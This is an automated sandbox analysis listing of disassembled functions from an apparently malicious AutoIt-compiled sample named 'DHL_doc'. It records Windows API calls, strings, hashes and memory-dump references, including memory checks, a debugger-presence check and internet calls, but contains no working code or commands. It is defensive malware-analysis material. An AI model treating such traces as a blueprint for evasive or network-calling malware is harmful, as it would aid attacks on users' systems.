Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: d693496e5df75a3f90afdcdb71d541aa8cef85de25861997d11a9f929f1dc7b9
Instruction ID: 53dd29e5686d772cc64da7ea8e4934e791ea83d3baa86c86d3476d136830b806
Opcode Fuzzy Hash: d693496e5df75a3f90afdcdb71d541aa8cef85de25861997d11a9f929f1dc7b9
Instruction Fuzzy Hash: C3510275900246DFEB15EF68C485AFA7BA8EF15320F24405AECA1AF3D0D6349D83DB90

Function 00EDF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00EDF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 00EDF2BB

Strings

@, xrefs: 00EDF2AF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 6a1c57ef02fa3a722660f28759a75f8240b5fb926e226b1386aeda33d6a4ce4a
Instruction ID: 909ff155597e0c3944f1334cb6aea74334d4cfb1d918de6825765b856d842ae9
Opcode Fuzzy Hash: 6a1c57ef02fa3a722660f28759a75f8240b5fb926e226b1386aeda33d6a4ce4a
Instruction Fuzzy Hash: 205155715087889BD320AF14DD86BAFBBF8FB84300F81884DF1D9511A5EB31856ACB67

Function 00F45745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00F457E0
_wcslen.LIBCMT ref: 00F457EC

Strings

CALLARGARRAY, xrefs: 00F457E6, 00F457EB

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: abe2e0a3f1825f4804ea5ce3d0f6c7a56ede8d214859312e27919212d357f62c
Instruction ID: 2389f135a6bdd5c6f17be90cfad4865689b4b7e5469bde9d664fe33743a031b0
Opcode Fuzzy Hash: abe2e0a3f1825f4804ea5ce3d0f6c7a56ede8d214859312e27919212d357f62c
Instruction Fuzzy Hash: 4F41A131E002099FCB04EFA8C885DAEBFF5FF59724F145069E905A7292EB359D81DB90

Function 00F3D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F3D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F3D13A

Strings

|, xrefs: 00F3D10B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 3ca591a133226425ef0ad25737c4a52e8721e8502083ddaae1751f570a98c73c
Instruction ID: 046d9a87465890f44d4dbcc7c02cd0d5b1aa243f91ff0b0b56dae97e52f57bb1
Opcode Fuzzy Hash: 3ca591a133226425ef0ad25737c4a52e8721e8502083ddaae1751f570a98c73c
Instruction Fuzzy Hash: A8310671D00209ABDF15EFA5DD85EEEBFB9FF04350F100019E815B6162E732AA16DB60

Function 00F5356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00F53621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F5365C

Strings

static, xrefs: 00F535BC

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 37c70c7da5bc33ed0cdb628ca489fac823ce4e93e2971765ed7297822ff0bfcc
Instruction ID: 404a5995535b798daf75d0e7f8a27884dcaa4377e3e9d6bdcb48837ee2d2ea43
Opcode Fuzzy Hash: 37c70c7da5bc33ed0cdb628ca489fac823ce4e93e2971765ed7297822ff0bfcc
Instruction Fuzzy Hash: 9831AF71500604AEDB109F28DC80FFB73A9FF88761F10961DFEA597280DA31AD86E760

Function 00F54537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00F5461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F54634

Strings

', xrefs: 00F5458E

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 00d72e71d87cd9b9b07ac9238d5b7dcd266db82e4a3205ac24a3083f9164cf88
Instruction ID: 934a535853cd4a8692a823c532c9add5d9f6225a03ec3f8c5d7bb40acd41eda7
Opcode Fuzzy Hash: 00d72e71d87cd9b9b07ac9238d5b7dcd266db82e4a3205ac24a3083f9164cf88
Instruction Fuzzy Hash: 44313975A0130A9FDB14CF69C990BDABBB5FF09305F14406AEE05AB381E770A985DF90

Function 00F531EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F5327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F53287

Strings

Combobox, xrefs: 00F53249

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 8a52cea7d09003ec7c9ab363c0784a1f32c4873fa886fa2d940640cad991e3e6
Instruction ID: 864b8a356fa8cdeeee3610bddb4fd3b7b10e1dbfb5fb96ac44b3b514ae7e3ba2
Opcode Fuzzy Hash: 8a52cea7d09003ec7c9ab363c0784a1f32c4873fa886fa2d940640cad991e3e6
Instruction Fuzzy Hash: DC11E2717006087FEF219F58DC80EBB3B6AEB943A5F104128FA18E7290D631DD55A760

Function 00F53710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00EC600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00EC604C
Part of subcall function 00EC600E: GetStockObject.GDI32(00000011), ref: 00EC6060
Part of subcall function 00EC600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC606A

GetWindowRect.USER32(00000000,?), ref: 00F5377A
GetSysColor.USER32(00000012), ref: 00F53794

Strings

static, xrefs: 00F53757

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 053086a85f28381d6880bbc1b47b3e07a430de42222d5038a4ad55d056ab082b
Instruction ID: 072c98cba52d54a3e8a8ae3bbce46796f75e3730d821d17e9ec4c3f0e64490cd
Opcode Fuzzy Hash: 053086a85f28381d6880bbc1b47b3e07a430de42222d5038a4ad55d056ab082b
Instruction Fuzzy Hash: 06115CB2A10209AFDF00DFA8CC45EEA7BB8FB08355F004514FE56E2150E735E855AB50

Function 00F3CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F3CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F3CDA6

Strings

<local>, xrefs: 00F3CD66

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 343487339f91f36e1adb6c46368d74e6acb14d909a9828d7fe3c558a773d22ce
Instruction ID: 36854ae121d9e81cab567e1ae63d6cc4f6e7f3c3654e94c914bc845ec9910659
Opcode Fuzzy Hash: 343487339f91f36e1adb6c46368d74e6acb14d909a9828d7fe3c558a773d22ce
Instruction Fuzzy Hash: D911C6766056367AD7344B668C49FE7BE6CEF127B4F004226B129A3180D7709840E7F0

Function 00F53429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00F534AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F534BA

Strings

edit, xrefs: 00F5348F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: af42e846f443a7899ab87989a2b15292b3e5f5230055895e9fbcb065a59f405c
Instruction ID: 11fb0f9961fc46e89c9a7af1372910211edf7491204181a9f21a2e7bc6333be8
Opcode Fuzzy Hash: af42e846f443a7899ab87989a2b15292b3e5f5230055895e9fbcb065a59f405c
Instruction Fuzzy Hash: BE116D71500208AFEB218E68DC44AAB376AEB053B5F504724FE65931D4C771DD9AA750

Function 00F26C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00F26CB6
_wcslen.LIBCMT ref: 00F26CC2

Strings

STOP, xrefs: 00F26CBC, 00F26CC1

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 717be2ebaadff80109a515f2fa0e215f5732aebc8c1d91d885eaa10259bca963
Instruction ID: 8b8fc338e9d6c0e334e92641eec3e84a1ddd045cd3ea63692f015143242df0fd
Opcode Fuzzy Hash: 717be2ebaadff80109a515f2fa0e215f5732aebc8c1d91d885eaa10259bca963
Instruction Fuzzy Hash: D901C432A0053B8BCB20AFFDEC809BF77E5EB617257500529E862E7191EA32D941E650

Function 00F21CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

Part of subcall function 00F23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F23CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F21D4C

Strings

ComboBox, xrefs: 00F21CEB
ListBox, xrefs: 00F21D16

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ff2a887d2b5ca915c059ddb552c880d600ab51bc9b1edef83ae8b17731868e1d
Instruction ID: 54ee779a63a6fc206eafeffb3d03d6fcd038963f7ce2a2b4f7e80239e7cbb4bc
Opcode Fuzzy Hash: ff2a887d2b5ca915c059ddb552c880d600ab51bc9b1edef83ae8b17731868e1d
Instruction Fuzzy Hash: CE012D71A00224ABCB08EFA0ED15EFE73A4FB52350B500519F832672C1DA355909A760

Function 00F21BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

Part of subcall function 00F23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F23CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00F21C46

Strings

ComboBox, xrefs: 00F21BE5
ListBox, xrefs: 00F21C10

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 784cb7c8990278f55261f5db83d852a8486aa67310ff815c60de3a332e08fc5b
Instruction ID: 8e27a9a01db4ce194dde5089a73c27c81f05fb7e914930eae4131a88a389d55d
Opcode Fuzzy Hash: 784cb7c8990278f55261f5db83d852a8486aa67310ff815c60de3a332e08fc5b
Instruction Fuzzy Hash: 6201FC75AC021867CB04FB90DE55EFF77E8AB21340F100019A41677182EA259F08A7B5

Function 00F21C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

Part of subcall function 00F23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F23CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00F21CC8

Strings

ComboBox, xrefs: 00F21C69
ListBox, xrefs: 00F21C94

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 026d27cd3ff5e0aacf4ccc9feb889e8f3569c412040b72b535b999dfc33b36a4
Instruction ID: 0032fce599bc11c2edd8d3691f6359598adc734c25a11da3f715fa0acc6423e5
Opcode Fuzzy Hash: 026d27cd3ff5e0aacf4ccc9feb889e8f3569c412040b72b535b999dfc33b36a4
Instruction Fuzzy Hash: 7C01D075BC122867CB04FB90DF15FFE77D8AB21740F140019780177182EA259F19E675

Function 00F21D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

Part of subcall function 00F23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F23CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00F21DD3

Strings

ComboBox, xrefs: 00F21D75
ListBox, xrefs: 00F21DA0

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 821de120bea0eada386a9d3a01e04dc3e66f046dc173b382cf0ff0e8e90f4ba4
Instruction ID: db82a6cfb0e5465bc0b21a8fc5863b9b5198a9499cc9bd8d79262367f3dee887
Opcode Fuzzy Hash: 821de120bea0eada386a9d3a01e04dc3e66f046dc173b382cf0ff0e8e90f4ba4
Instruction Fuzzy Hash: 70F07D72B40328A7CB04F7A0DD55FFF73F8BB11350F400918B422772C2DA2559089264

Function 00F4747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F47493
_wcslen.LIBCMT ref: 00F474B9

Strings

3, 3, 16, 1, xrefs: 00F47483

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 822a4cf91e19c0bbfb5b2f629a83356bf4367c2419e24041e1b91939b97cda17
Instruction ID: a9509ce973b409dbab08bd93a9c9783fba33428ec267193247830f152fd65e3a
Opcode Fuzzy Hash: 822a4cf91e19c0bbfb5b2f629a83356bf4367c2419e24041e1b91939b97cda17
Instruction Fuzzy Hash: 8FE02B42604361509331327AACC1A7F5BC9CFC9760710282BFD81E22B7EB95CD91A3F1

Function 00F20B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F20B23

Strings

Error allocating memory., xrefs: 00F20B1C
AutoIt, xrefs: 00F20B17

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 227abc849a4cadbc9fd8e5df60fa1e6142ace5b3e4728aef7f7eafea9c1a73e0
Instruction ID: 6ef43d0c6c47043b2240b71bdbb045633e79144c537ac13a7abc0b1253676c97
Opcode Fuzzy Hash: 227abc849a4cadbc9fd8e5df60fa1e6142ace5b3e4728aef7f7eafea9c1a73e0
Instruction Fuzzy Hash: B5E0D8322443182FD21036957C07F897FC4CF09F61F10042BFB4AB55C38AD2645066EA

Function 00EE0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00EDF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00EE0D71,?,?,?,00EC100A), ref: 00EDF7CE

IsDebuggerPresent.KERNEL32(?,?,?,00EC100A), ref: 00EE0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EC100A), ref: 00EE0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EE0D7F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: a7ff5fada6d3210e300d3b5651aeee4270a65be8e3e48303f311f0d064c5dcbb
Instruction ID: 537ca6a96c90484aa398a1ea5219e90e863b5596989ba70bcfa9603a861a232c
Opcode Fuzzy Hash: a7ff5fada6d3210e300d3b5651aeee4270a65be8e3e48303f311f0d064c5dcbb
Instruction Fuzzy Hash: F8E06D702007458FD3209FB9D8057467BE0AB00745F00496EE982E6651DBF1E4899BA1

Function 00F33017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00F3302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00F33044

Strings

aut, xrefs: 00F33038

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

